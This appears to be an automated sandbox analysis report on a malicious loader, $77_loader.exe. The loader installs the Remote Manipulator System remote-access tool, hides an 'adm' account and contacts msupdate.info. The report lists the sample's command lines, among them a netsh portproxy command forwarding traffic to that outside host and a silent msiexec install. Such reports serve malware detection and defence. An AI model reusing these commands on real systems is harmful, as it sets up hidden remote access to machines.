Analysis Overview
SHA256
3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
Threat Level: Known bad
The file $77_loader.exe was found to be: Known bad.
Malicious Activity Summary
RMS
Downloads MZ/PE file
Sets file execution options in registry
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Modifies powershell logging option
Enumerates connected drives
Modifies WinLogon
Checks installed software on the system
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: SetClipboardViewer
Suspicious behavior: EnumeratesProcesses
Gathers network information
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-04-16 05:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-16 05:29
Reported
2022-04-16 05:32
Platform
win7-20220414-en
Max time kernel
153s
Max time network
153s
Command Line
Signatures
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
Sets file execution options in registry
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
Checks installed software on the system
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Modifies powershell logging option
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7pfhmfid.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4C5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE419.tmp"
C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Users\Admin\AppData\Local\Temp\RMS.exe
"C:\Users\Admin\AppData\Local\Temp\RMS.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | msupdate.info | udp |
| US | 8.8.8.8:53 | csc3-2004-crl.verisign.com | udp |
| US | 8.8.8.8:53 | msupdate.info | udp |
| LT | 5.133.65.53:443 | msupdate.info | tcp |
| LT | 5.133.65.53:80 | msupdate.info | tcp |
| N/A | 127.0.0.1:999 | tcp | |
| N/A | 127.0.0.1:999 | tcp | |
| N/A | 127.0.0.1:999 | tcp | |
| N/A | 127.0.0.1:5650 | tcp | |
| RU | 77.247.243.43:5655 | tcp | |
| LT | 5.133.65.53:443 | msupdate.info | tcp |
Files
memory/1884-54-0x000007FEF39D0000-0x000007FEF4A66000-memory.dmp
memory/1884-55-0x000007FEEE760000-0x000007FEEF2BD000-memory.dmp
memory/1604-56-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\7pfhmfid.cmdline
| MD5 | 64a68a4e66e77da60bb5f7eaaf57dc48 |
| SHA1 | 4e9c01d758238621db4e48393ea6e27bb69e61ce |
| SHA256 | 03cd1f7dd37dca5b739c158b6b49ae163d1b7876b5efc5a85d8c0a67e0560a33 |
| SHA512 | f4203c58151d4a360d9078607f40ce180b1f7aab4bd56ec74f606cd283411d0a071d280aff18b98db44d467413b7d71e02aab9fbd35d5b3fca8905a783f608da |
\??\c:\Users\Admin\AppData\Local\Temp\7pfhmfid.0.cs
| MD5 | 1640a04633fee0dfdc7e22c4f4063bf6 |
| SHA1 | 3cb525c47b5dd37f8ee45b034c9452265fba5476 |
| SHA256 | 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0 |
| SHA512 | 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d |
memory/1312-59-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSCE419.tmp
| MD5 | bfff1fdd1891d6abe22a5190674c5f75 |
| SHA1 | b332bba58f14ffecb0c65dfab1bf3f2768b9f5b8 |
| SHA256 | 31cc624c565faf405fe313eba91211316e01eed91cf9608230d19e214ff7339f |
| SHA512 | 2e3296eea0ea31b33cc2244f59c22893d5e4aae1e183e9468595948eac63d4990474e84b102d17f31cdd25de4bf6c7d79a456ec22c341e24551cd191888a13df |
C:\Users\Admin\AppData\Local\Temp\RESE4C5.tmp
| MD5 | ecd44e1b05ff5cbe348452205cb6817c |
| SHA1 | 2dfd14c7d0bb084048b29be433cb5272e2600381 |
| SHA256 | 4700e9591d1c219c9c439a0fb3b8146f4b7e9169bfcfd6775ebaab3dd6f54076 |
| SHA512 | f7487ef9e5c251fe66bc189664c3036ca02934e4493e68ce8f34e92d88c90d1b89be66cf0d484f606069ff35521ecd1d7da0d47abcedad7cc2336aa440b9a761 |
C:\Users\Admin\AppData\Local\Temp\7pfhmfid.dll
| MD5 | 196e4191a5c2d9ed3c16732d8bd89653 |
| SHA1 | 3283fb09f93b2c5d6aa4e5b88f46a492fbab6270 |
| SHA256 | 12ac6124bada4d415df7594e7897612a7474917bd354f5076790dc4e72292936 |
| SHA512 | 90af409c12b294deda59e9cb602fd62e97255788e504eba58be4de28045a83de55c116ce2c030db03022577659b69a7439858eb45ff7ac70bcdd27763be8bcff |
C:\Users\Admin\AppData\Local\Temp\7pfhmfid.pdb
| MD5 | 30856c96c1615aadf1f11875bda8acb7 |
| SHA1 | 38335c38f1c7164c9c0b481125f6e43c4bd69035 |
| SHA256 | 27b3acece18342543cc3cc33a70f49b9a0cb2eb5b4d8d6199086b2ac6bf63e85 |
| SHA512 | 9091b445e9c62dddf0bbb88a37d9fdfbaabcc38d22cd87965145334560a5431036f35e0f1e0b71e6062fd3054fd736f8a8320cf0774753c96f2a97e4534e9e67 |
memory/1632-64-0x0000000000000000-mapping.dmp
memory/432-65-0x000007FEFBCA1000-0x000007FEFBCA3000-memory.dmp
memory/948-66-0x0000000000000000-mapping.dmp
memory/2032-68-0x0000000000000000-mapping.dmp
memory/1224-69-0x0000000000000000-mapping.dmp
memory/1600-70-0x0000000000000000-mapping.dmp
memory/1608-71-0x0000000000000000-mapping.dmp
memory/1280-73-0x0000000000000000-mapping.dmp
memory/1328-75-0x0000000000000000-mapping.dmp
memory/600-77-0x0000000000000000-mapping.dmp
memory/1548-79-0x0000000000000000-mapping.dmp
memory/684-81-0x0000000000000000-mapping.dmp
memory/1860-82-0x0000000000000000-mapping.dmp
memory/1252-83-0x0000000000000000-mapping.dmp
memory/1884-84-0x000000001B580000-0x000000001B599000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS.exe
| MD5 | 73f351beae5c881fafe36f42cde9a47c |
| SHA1 | dc1425cfd5569bd59f5d56432df875b59da9300b |
| SHA256 | a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824 |
| SHA512 | f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66 |
memory/1112-85-0x0000000000000000-mapping.dmp
memory/1112-87-0x0000000075191000-0x0000000075193000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS.exe
| MD5 | 73f351beae5c881fafe36f42cde9a47c |
| SHA1 | dc1425cfd5569bd59f5d56432df875b59da9300b |
| SHA256 | a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824 |
| SHA512 | f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66 |
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
memory/860-90-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi
| MD5 | 73e578a44265558d3ace212869d43cbb |
| SHA1 | d2c15578def8996ed0ae4a44754055b774b095a7 |
| SHA256 | 8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4 |
| SHA512 | fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4 |
memory/1280-95-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-04-16 05:29
Reported
2022-04-16 05:32
Platform
win10v2004-20220414-en
Max time kernel
146s
Max time network
156s
Command Line
Signatures
RMS
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | N/A |
Sets file execution options in registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Modifies powershell logging option
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\English.lg | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57fd4c.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{D9E14363-FD66-419D-9DC9-C62471755C9F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI329.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57fd4f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe | C:\Windows\system32\msiexec.exe | N/A |
